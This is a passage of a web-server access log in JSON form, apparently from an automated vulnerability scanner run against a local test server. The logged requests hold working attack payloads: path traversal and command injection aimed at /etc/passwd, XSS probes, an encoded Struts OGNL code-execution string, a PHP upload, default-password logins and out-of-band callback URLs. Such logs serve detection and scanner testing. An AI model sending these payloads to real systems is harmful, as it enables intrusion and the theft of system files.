+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"http://127.0.0.1/diagnostic.html?t=201701020919", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fcgi-bin/wgsetcgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-daily.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elfinder.min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app/kibana/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.user.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/mappings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /img.php?f=/./etc/./passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/canal/config/1/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-issues.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js/elFinder.version.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /updating.jsp?url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=admin&password=admin&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://ca28q98smpvbk9ig07h0k3d8gadpni5c4.oast.online/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://ca28q98smpvbk9ig07h0o84nzdruyy46w.oast.online/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://ca28q98smpvbk9ig07h0nwqjzsbgwb4mb.oast.online\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sysmgmt/2015/bmc/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('29KFpYdF8n04OB8AtwZg15N6sZT')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/smoosh-status.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KFpQ6TyZteM9K6M2RLiCv2e4D.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29KFpQ6TyZteM9K6M2RLiCv2e4D&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=hue&password=hue&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stat.jsp?cmd=chcp+437+%7c+dir HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:06:08:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 